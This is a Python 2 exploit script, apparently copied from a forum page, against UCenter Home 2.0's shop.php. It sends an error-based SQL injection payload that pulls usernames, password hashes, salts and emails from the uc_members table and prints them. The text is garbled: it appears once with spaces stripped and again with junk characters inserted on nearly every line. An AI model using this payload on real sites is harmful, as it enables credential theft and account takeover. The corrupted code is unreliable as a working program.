#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
0 X2 B. W9 U- ~ . s: S, L: N# v1 R9 q
' `# n0 X9 P. R2 K6 `; g- F% l+ t
#!/usr/bin/env python 9 i; F0 \/ U. }7 }- t: [8 E
* O) o! L# v9 N# ~: j
import sys
$ ^2 M6 d$ V4 K; y' P7 Mimport urllib2
9 H. @9 C- l: A) P+ b: n2 Timport re
6 t' m$ A* }( V. c% B
- w: F0 p6 e) \! N( }& |def info():
/ [8 h7 @: R( E4 v2 v g) v print 'From:http://www.exploit-db.com/exploits/14997/' 3 W. B2 J/ c5 U! w4 e0 M1 S# l- H
print 'http://www.hake.cc/Web_loudong/' , u) h' w1 ?5 J+ e! g
print 'changed:qiaoy'
) P! c, l) m7 C C" T" o print 'exp:' " F+ m" M2 i! D0 `
print ' ./UCenter_Home_2.0.py site' " r: C4 \5 a( z" W5 M: S
3 b U5 ?& z% h# I0 ?
def main():
" t2 R* g- e; n: s if len(sys.argv) != 2: 2 m& J& x" D$ O8 V1 ]
info()
% C/ c) W! t* K: }9 m: S: q+ S$ z else:
% ?3 s) ^. s' [9 D1 s site = sys.argv[1] . h2 E4 {; Z$ @% t& v
if site[0:7] == 'http://':
9 q* d9 e; i0 Y; U! I l6 q sitesite =site - @- _- Z9 e6 Z% Q9 w" o
elif site[0:8] == 'https://':
( W0 r. J' H( ~8 B( v, ^ sitesite = site ) C* e( J+ ]2 [1 {4 }% [/ e
else: * P4 q- P' ^. D$ F' [& ~: L# [5 y
site = 'http://'+site $ V! `+ c3 {9 F5 A4 G& b5 s$ f$ T& p* o
try: 2 o+ M, k. ~8 Y2 R+ ^
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' ( h# {7 y* m1 e+ b9 `- L P
Value = urllib2.urlopen(url).read() 4 }( n% t9 o, D! u7 w8 Q! Z; z6 U3 Q
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
( W$ }, Z% q# ~, G7 y$ o1 M hacked = Msg.split(':') * t6 o( f! B6 X: e l" A9 t. T1 g
print 'Name: '+hacked[1]
' |# l( J) {; X4 J5 W print 'Passwd: '+hacked[2] 0 M6 Z; E$ W1 ?! L9 {
print 'salt: '+hacked[3]
- y/ N. W: m$ S5 T print 'email: '+hacked[4] - y& s$ a0 k, J
except: * x, j8 B- _- l% F: ]* ~
print 'Sorry,I can\'t work............' ' [2 g6 o' u% @1 B- i
4 u5 X' J- `3 B
if __name__ == '__main__': 4 y7 V( ^- |% K: C% C
main() |